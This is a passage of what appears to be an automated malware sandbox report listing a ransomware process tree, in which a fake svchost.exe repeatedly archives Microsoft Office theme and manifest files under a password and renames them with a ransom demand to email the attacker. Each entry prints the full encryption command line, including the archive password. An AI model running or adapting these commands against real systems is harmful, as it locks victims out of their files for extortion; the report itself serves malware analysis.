  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Paper.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Paper.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1628
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Orange.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Violet.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red Violet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2152
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Slipstream.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6092
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet II.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3896
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Violet.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow Orange.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow Orange.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial Black-Arial.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial Black-Arial.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4164
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial-Times New Roman.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial-Times New Roman.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Arial.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1212
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:432
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri-Cambria.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:216
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Cambria.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:3180
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Candara.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Candara.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Gothic-Palatino Linotype.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Gothic-Palatino Linotype.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Gothic.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Gothic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Schoolbook.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Schoolbook.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5096
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Consolas-Verdana.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Consolas-Verdana.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4556
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Constantia-Franklin Gothic Book.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Constantia-Franklin Gothic Book.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4980
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Corbel.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:712
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Franklin Gothic.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Franklin Gothic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2404
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond-TrebuchetMs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3584
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Georgia.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Georgia.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Gill Sans MT.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Gill Sans MT.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5448
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6008
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Times New Roman-Arial.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Times New Roman-Arial.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\TrebuchetMs.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\TrebuchetMs.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3324
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:6116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4744
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.dcfmui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.dcfmui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4516
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3512
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.excelmui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32mui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32mui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32ww.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.office32ww.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.officemuiset.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4116
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4888
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.onenotemui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.onenotemui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:436
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5612
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmmui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmmui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5168
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5084
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.osmuxmui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4660
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4872
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.powerpointmui.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.powerpointmui.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:5524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.PowerView.PowerView.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2332
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3800
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.proofing.msi.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:6120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Integration\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1480
- C:\ProgramData\msvkp\svchost.exe
